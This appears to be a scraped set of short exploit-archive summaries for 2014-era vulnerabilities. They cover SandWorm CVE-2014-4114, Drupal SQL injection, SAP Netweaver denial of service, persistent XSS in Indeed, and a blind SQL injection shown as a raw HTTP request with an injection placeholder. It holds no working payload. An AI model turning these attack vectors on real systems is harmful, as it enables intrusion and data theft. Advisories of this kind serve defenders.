This exploit builder is a quick and ugly exploit for the SandWorm CVE-2014-4114 vulnerability. It is built to run on Linux/MacOSX and was tested on Win7Sp1 64 bit with Microsoft Office 2013 Plus. It modifies the oleObject1.bin and oleObject2.bin files to include the host, share, and dropper file, and then zips the modified PoC into a .ppsx file.
A vulnerability in Aireplay-ng 1.2 beta3 allows a remote attacker to execute arbitrary code via a crafted packet sent to the target system. This is due to a stack-based buffer overflow in the "aireplay-ng --test" option. The vulnerability is caused by improper bounds checking of the length parameter in the "tcp_test" function. An attacker can exploit this vulnerability by sending a specially crafted packet to the target system, which will cause the stack to be overwritten with attacker-controlled data.
A vulnerability has been found in SAP Netweaver that could allow an unauthenticated, remote attacker to create denial of service conditions. The vulnerability is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN (NN being the SAP system number) of a host running the 'Standalone Enqueue Server' service, part of SAP Netweaver Application Server ABAP/Java. The 'Standalone Enqueue Server' is a critical component of a SAP Netweaver installation in terms of availability, rendering the whole SAP system unresponsive.
This exploit allows an attacker to inject malicious SQL code into a vulnerable Drupal website. The malicious code is sent as part of a POST request to the website, which then executes the code and allows the attacker to gain access to the website. The exploit is triggered by sending a specially crafted POST request to the website, which contains the malicious SQL code.
This exploit is based on the SA-CORE-2014-005 vulnerability in Drupal 7.x. It was inspired by yukyuk's P.o.C and tested on Drupal 7.31 with BackBox 3.x. It uses a custom hash algorithm to generate a non-truncated Drupal 7 compatible password hash.
A persistent input validation web vulnerability has been discovered in the official Indeed.com mobile web-application (api). The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable module. The request method to inject is POST and the attack vector is located on the application-side. The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the persistent input validation web vulnerability requires no user interaction or privileged application user account. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected module context.
This vulnerability affects Seo Control Panel - Product: Seo Panel Version 3.6.0. Their are multiple vulnerabilitis in the project not all of them are exploitable. The Flowing exploit is able to successfull bypass the implemented protections based on set of regex with along with a blacklist. The protection can easly be bypassed with payload used by this exploit. The Vulnerable method exploite is located at: file: seo-plugins.php, method: __getSeoPluginInfo, lines: 175 to 178, Due to incorrect use of database client api.
When the administrator login, clicking on the link provided will cause the device to reboot.
The Blind SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from blind SQL injection: GET /?ym_download_id=<SQL Injection> HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wfvt_2871549622=5434f2560126f; wpfront-notification-bar-landingpage=1; bp-activity-oldestpage=1; __utma=9793911.1350365293.1412756050.1412756050.1412756050.1; __utmb=9793911.1.10.1412756050; __utmc=9793911; __utmz=9793911.1412756050.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); all_RyDwsSBXVzZXJzGOTe_u0CDA-clickdesk_referrer=http%3A//www.google.com.vn/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26ved%3D0CB0QFjAA%26url%3Dhttp%253A%252F%252Fsdj Connection: keep-alive
The O2 Connection Manager's service suffers from an unquoted search path issue impacting the Import WiFi 'TGCM_ImportWiFiSvc' service for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application.
Services By CQR